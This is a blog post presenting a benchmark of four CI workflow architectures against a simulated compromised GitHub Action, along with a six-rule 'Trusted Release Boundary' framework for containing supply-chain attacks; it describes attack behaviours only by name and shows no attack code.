DEV Community

Cover image for Your AI Agent Will Make CI Supply-Chain Defense Either Too Weak or Too Expensive
Ahmed Yasser
Ahmed Yasser

Posted on

Your AI Agent Will Make CI Supply-Chain Defense Either Too Weak or Too Expensive

SHA pinning wasn't enough. Enterprise hardening was too much. So I built a benchmark.

When tj-actions/changed-files was compromised, the advice spread fast: pin your SHAs, reduce token permissions, review your workflows.

That advice was not wrong. It was just incomplete.

What kept bothering me was this: pinning only helps if the thing you pinned is not already malicious. If the pinned code is the attack, or the compromised version is exactly what your workflow is using, then SHA pinning gives you determinism, not safety.

That turned into a bigger frustration I kept seeing in practice, especially when AI coding agents started generating CI security fixes.

You build a normal project. You are not trying to become a deep CI security specialist. Then the model suddenly proposes an enterprise-grade answer: hardened runners, attestation, egress controls, multiple extra jobs, maybe cloud federation, maybe more. Some people accept it, but the overhead is high. Some reject it immediately because the performance hit and operational burden feel too big. Then the "smart compromise" is to tell the AI to make the minimal secure fix, and it usually lands on the same answer: SHA pinning plus basic permission scoping.

That is better than nothing. It is also not enough.

So I wanted to find the missing middle: a solution stronger than the typical AI-generated "just pin the SHA" workflow, but much lighter than a full enterprise security stack. I wanted something that meaningfully changed the blast radius without adding significant cost.

The Question

What CI architecture actually contains a compromised action?

I did not want an opinion post. I wanted an experiment.

I built a reproducible benchmark that keeps the repository, source file, malicious action, and GitHub Actions platform constant. The only changing variable is the workflow architecture.

If the same malicious action runs against four different CI designs, which design actually stops the bad outcomes?

The Setup

The repo contains:

  • a tiny deterministic app
  • a fake deploy script
  • a local composite action that simulates a compromised third-party action

The app is intentionally trivial because I wanted the benchmark to measure CI trust boundaries, not application complexity.

The malicious action performs six behaviors:

  1. Environment variable dumping
  2. GITHUB_TOKEN permission probing
  3. Process memory access checks
  4. Outbound exfiltration attempts
  5. Artifact poisoning
  6. Source enumeration

I ran that same action against four workflow tiers.

Tier 1: No Security

This is the insecure baseline.

  • third-party code runs in the same job as deployment secrets
  • release happens from the same compromised workspace
  • the artifact upload happens after the malicious action can already modify it

Tier 2: SHA-Pinned

This is the typical "minimal security fix" AI agents often suggest.

  • pin actions by SHA
  • reduce workflow permissions
  • keep the same workflow shape

This tier isolates what pinning and token scoping actually buy you when compromised code still executes in the trusted lane.

Tier 3: Trusted Release Boundary

This is the candidate solution.

  • the untrusted lane gets no deployment secrets
  • the trusted release lane is separate
  • outputs crossing the boundary are validated
  • the release lane runs on a fresh runner
  • the release lane rebuilds from source instead of consuming artifacts from the untrusted lane

This is the core idea I ended up calling the Trusted Release Boundary.

Tier 4: Enterprise

This keeps the Tier 3 boundary model and adds stronger controls:

  • hardened runner with egress blocking
  • artifact attestation
  • more operational complexity

This is the upper-bound comparison, not the target solution for most teams.

Full repo:

https://github.com/AlphaSudo/sbtr-benchmark

The Results

Here is the final score table:

Tier Architecture Score Annual Cost
1 No security 10/100 $0
2 SHA-pinned 20/100 $0
3 Trusted Release Boundary 75/100 $0
4 Enterprise (egress + attestation) 83/100 enterprise-style overhead

The exact score matters less than the shape of the jump.

Benchmark Comparison Table

Tier 1

Tier 1 got owned exactly the way you would expect:

  • secrets were accessible in the same job
  • the token could create releases
  • outbound exfiltration worked
  • the artifact was poisoned and shipped

This is full CI trust collapse.

Tier 2

Tier 2 improved one thing: token abuse. The workflow token could no longer create releases.

But almost everything else stayed bad:

  • the malicious action still saw secrets
  • outbound exfiltration still worked
  • the artifact was still poisoned and shipped

This is the point of the benchmark. SHA pinning did not fail because pinning is useless. It failed because pinning is not a containment strategy. It protects against mutable references and update drift. It does not protect you when the pinned version is already compromised.

Tier 2 Security Metrics

Tier 3

Tier 3 is where the architecture changes the outcome.

The malicious action still runs, but:

  • the untrusted lane has no deployment secrets
  • the token is not write-capable in any meaningful release sense
  • outputs cross a validation gate
  • the trusted lane rebuilds from source on a fresh runner
  • the shipped artifact is clean

This is the key result. The malicious action still executes, but it cannot meaningfully corrupt the release path because it never enters the trusted release domain.

Tier 3 Security Metrics

Tier 4

Tier 4 was strongest overall:

  • no secrets in the untrusted lane
  • outbound exfiltration blocked
  • validation gate present
  • clean artifact rebuilt from source
  • successful provenance attestation

This tier also taught a useful lesson. The first attestation attempt failed because the hardened egress policy was too strict and blocked Sigstore endpoints. After allowing fulcio.sigstore.dev and rekor.sigstore.dev, the release succeeded.

That is the reality of enterprise controls: they can be very strong, but they also increase the operational tuning burden.

The Climax: Artifact Integrity

The most convincing proof in the benchmark was not the secret count. It was the artifact result.

  • Tier 1 shipped a poisoned artifact
  • Tier 2 shipped a poisoned artifact
  • Tier 3 shipped a clean artifact
  • Tier 4 shipped a clean artifact

Same repository. Same source file. Same malicious action. Same platform.

The variable was architecture.

That is the point where this stops being theoretical. If an attacker can modify the artifact you ship, then the debate about whether a workflow "looked secure" is over.

Artifact Proof

The Framework

The benchmark converged on a six-rule model:

Rule Name Purpose
0 PIN Immutable SHA references for all external actions
1 QUARANTINE Untrusted lane gets no secrets and no write authority
2 ISOLATE Trusted lane is separate and first-party only
3 REBUILD Trusted lane rebuilds from source on a fresh runner
4 ARTIFACT QUARANTINE Only metadata crosses the boundary, never untrusted binaries
5 VALIDATE Outputs crossing the boundary are explicitly sanitized

Why this matters:

  • PIN is still necessary, but it is not the whole answer
  • QUARANTINE and ISOLATE stop same-job trust collapse
  • REBUILD and ARTIFACT QUARANTINE stop poisoned binaries from riding the release path
  • VALIDATE closes the quieter gap where untrusted outputs become trusted control inputs

That combination is what makes Tier 3 work.

And that is why I think this is a useful practical framework: it gives teams a real middle path:

  • stronger than "just pin the SHA"
  • far lighter than "full enterprise security stack"

Honest Limitations

A few caveats matter.

First, this benchmark repo is public. That means source exposure is less severe than it would be in a private repository.

Second, the malicious action is simulated. It is designed to be reproducible, not stealthy. A real attacker would likely be quieter.

Third, there was a line-ending caveat. Local Windows hashing used CRLF, while GitHub-hosted Linux runners built artifacts from LF checkouts. So clean artifact comparisons had to be anchored to the normalized Linux source hash.

Fourth, Tier 3 still leaves outbound network access open. That is one reason Tier 4 scores higher. TRB is the biggest low-cost jump, not the final possible hardening state.

Why I Think This Matters

What I wanted out of this project was not a perfect security architecture for every team. I wanted a better answer to a very common failure mode:

someone wants more than SHA pinning, but does not want enterprise-grade overhead.

That is exactly where a lot of real teams live.

They are not ignoring security. They just cannot justify a dramatic performance hit, a large operations burden, or a full platform-engineering project because an AI assistant suggested the maximum possible hardening pattern.

The benchmark result suggests there is a much better default answer:

build a trusted release boundary.

That is the smallest change in this experiment that materially changed the attack outcome.

Try To Break It

If you want to reproduce the benchmark, the repository includes the workflows, malicious action, evidence, and reproduction guide.

I genuinely want feedback on where this model breaks, where the validation boundary is too weak, or where the assumptions stop holding under more realistic CI environments.

Because the goal here is not to claim "problem solved."

The goal is to offer a better alternative than:

  • overkill enterprise security that many teams will reject
  • minimal SHA-only hardening that still leaves the release path too exposed

If that middle path is useful, then this benchmark did its job.

If you've seen CI patterns that break this model, leave them in the comments. I'm especially interested in where Tier 3 fails in real-world workflows.

Top comments (0)